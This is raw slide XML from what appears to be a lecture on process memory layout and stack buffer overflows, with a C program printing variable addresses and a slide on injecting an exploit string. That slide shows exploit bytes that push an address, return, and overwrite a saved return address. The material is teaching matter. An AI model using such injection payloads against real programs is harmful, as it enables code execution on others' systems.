            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> variable stored at %14p\n", small);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    long *large = (long *)malloc(1 &lt;&lt; 24);</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("Large </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc'd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> variable stored at %14p\n", large);</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Called function stored at %14p\n",</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print_stack_address</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Global variable stored at %14p\n", &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>global_variable</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String constant stored at %14p\n", string);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Group 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52127112-4D33-BF4B-AD64-A5AF9DFA0C5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3332882" y="790908"/>
            <a:ext cx="5558218" cy="3447413"/>
            <a:chOff x="3332882" y="790908"/>
            <a:chExt cx="5558218" cy="3447413"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Oval 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FE9928C-94BF-324F-B72F-A237E4366F6F}"/>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38959C91-591F-BA4E-A62F-644737746E52}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="3" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3332882" y="790908"/>
              <a:ext cx="2815018" cy="3220114"/>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34" name="Group 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B4AC9B1-3F9C-C24D-B5F6-180C77687F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3346693" y="827653"/>
            <a:ext cx="5413197" cy="1185846"/>
            <a:chOff x="2824346" y="1305817"/>
            <a:chExt cx="5413197" cy="1185846"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Oval 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D563C46-2D5A-4849-A0E1-DFD9C9DB3744}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5494343" y="2037065"/>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E7B6E73F-75D3-A841-8F71-5F5244FABCF0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="35" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2824346" y="1305817"/>
              <a:ext cx="2669997" cy="958547"/>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43" name="Group 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54C8E006-CEA6-364D-B0C0-8BE3D8146B83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3304191" y="2163604"/>
            <a:ext cx="7301409" cy="3220537"/>
            <a:chOff x="1589691" y="1017784"/>
            <a:chExt cx="7301409" cy="3220537"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Oval 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B634160C-BCA1-1944-886D-63919FFD3802}"/>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20D93950-39FD-7146-BE31-D4402DCEEAD2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="44" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1589691" y="1017784"/>
              <a:ext cx="4558209" cy="2993238"/>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47" name="Group 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{318FA2AB-38C2-C349-BD03-923D15F908FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3304191" y="4719041"/>
            <a:ext cx="7372602" cy="1081889"/>
            <a:chOff x="1518498" y="3156432"/>
            <a:chExt cx="7372602" cy="1081889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="Oval 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9645B2B-C623-624A-8CCC-09D53D8197BD}"/>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C4C6047E-BA60-2341-A4CE-F2B4195EE480}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="48" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1518498" y="3156432"/>
              <a:ext cx="4629402" cy="854590"/>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51" name="Group 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{381AEECE-4D6A-A440-B66D-7CEFECAB066C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3346693" y="1267876"/>
            <a:ext cx="5544407" cy="4729545"/>
            <a:chOff x="3346693" y="3783723"/>
            <a:chExt cx="5544407" cy="4729545"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="Oval 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4912D244-02E9-EF48-9E99-8F11C0842FAB}"/>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F977E9A3-AD51-A849-A5E1-D52456ECE1E9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="52" idx="2"/>
              <a:endCxn id="13" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3346693" y="4011022"/>
              <a:ext cx="2801207" cy="4502246"/>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55" name="Group 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D1B4BD3-9A3E-FB48-851E-FD11238FE46D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3332882" y="823894"/>
            <a:ext cx="5738219" cy="4559824"/>
            <a:chOff x="3152881" y="3783723"/>
            <a:chExt cx="5738219" cy="4559824"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="Oval 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5014493-EF3D-3347-A22F-6FC1A81A6619}"/>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C2194EB9-1EE9-AF40-B5D4-9A864FFE345C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="56" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3152881" y="4011022"/>
              <a:ext cx="2995019" cy="4332525"/>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59" name="Group 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F250842E-22AF-5C4C-A59F-BFE0A2C1E390}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3304191" y="4039129"/>
            <a:ext cx="8039458" cy="1334507"/>
            <a:chOff x="851642" y="3783723"/>
            <a:chExt cx="8039458" cy="1334507"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="Oval 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AEC4689-B797-8248-BB72-C6C92300F9E8}"/>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9620D574-F0F9-4646-AD1B-7F68CBF613D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="60" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="851642" y="4011022"/>
              <a:ext cx="5296258" cy="1107208"/>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03584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par>
                                <p:cTn id="13" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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par>
                                <p:cTn id="21" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="29" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="37" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="45" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="53" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="55"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Injecting and Executing the Exploit String</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TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60572507-0675-2548-9F59-997557C6BAEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1501620"/>
            <a:ext cx="2086918" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>back-again-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>string.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB574FB0-8A0F-B94F-B667-A15C12A64D6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571498" y="3458542"/>
            <a:ext cx="10782301" cy="158104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back-again-</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hH</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31" name="Rounded Rectangle 130">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FF90151-E1C1-0A4C-BEB0-A743BFBC30B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571499" y="1821677"/>
            <a:ext cx="8300358" cy="118577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68 48 06 40 00 c3 00 00   // </a:t>
            </a:r>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$0x400648; ret</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F8 DF FF FF FF 7F 00 00   // this return address is on the stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12002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How’d That Happen?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2CE0AEB-3D5D-2B4F-8930-6FC610ADD4FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571499" y="1821677"/>
            <a:ext cx="8300358" cy="118577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68 48 06 40 00 c3 00 00   // </a:t>
            </a:r>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$0x400648; ret</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F8 DF FF FF FF 7F 00 00   // this return address is on the stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60572507-0675-2548-9F59-997557C6BAEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1501620"/>
            <a:ext cx="2086918" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>back-again-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>string.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66D09A86-9C7F-054C-98E6-E4A16CBA26EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5553649" y="6163068"/>
            <a:ext cx="2675634" cy="369332"/>
            <a:chOff x="8434922" y="6044017"/>
            <a:chExt cx="2675634" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="129" name="TextBox 128">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{099C70A7-FDE0-5042-BFFD-587F5EA7C35A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8706500" y="6044017"/>
              <a:ext cx="2404056" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>rsp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> = 0x7FFFFFFFDFF0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="130" name="Straight Arrow Connector 129">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4A5197B-3FA3-5548-B2C8-AAA7463FD348}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="129"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671CA3DC-3C24-5948-87D6-1EBD17C234A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="701387" y="2762324"/>
            <a:ext cx="4830980" cy="3967780"/>
            <a:chOff x="686819" y="2753696"/>
            <a:chExt cx="4830980" cy="3967780"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="139" name="Group 138">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{496DCCF6-EFD4-6247-8EB0-8FD60F007718}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="5129253"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="176" name="Rectangle 175">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C1DAE9D-04BA-754A-B956-C7A4683D4DAB}"/>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77" name="Rectangle 176">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A457A33C-9972-2F4C-B845-977831DC0227}"/>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78" name="Rectangle 177">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{564380AD-8162-014F-AE79-4FB3475A39BB}"/>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79" name="Rectangle 178">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E54463DF-4897-6649-957F-1A09CEB6DDB5}"/>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0" name="Rectangle 179">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E9DE822-28C0-914D-A45D-3D93041260BB}"/>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1" name="Rectangle 180">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F199D4D-1F86-FE40-A643-123ECD5EB3DD}"/>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2" name="Rectangle 181">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56889630-7ACF-7340-8B3B-18A04B6B10E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3" name="Rectangle 182">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7164F572-0E4B-4A44-A336-224A73B5FEBB}"/>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140" name="Group 139">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17AABFC5-2145-5543-9530-49FC551A6748}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="5927470"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="168" name="Rectangle 167">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
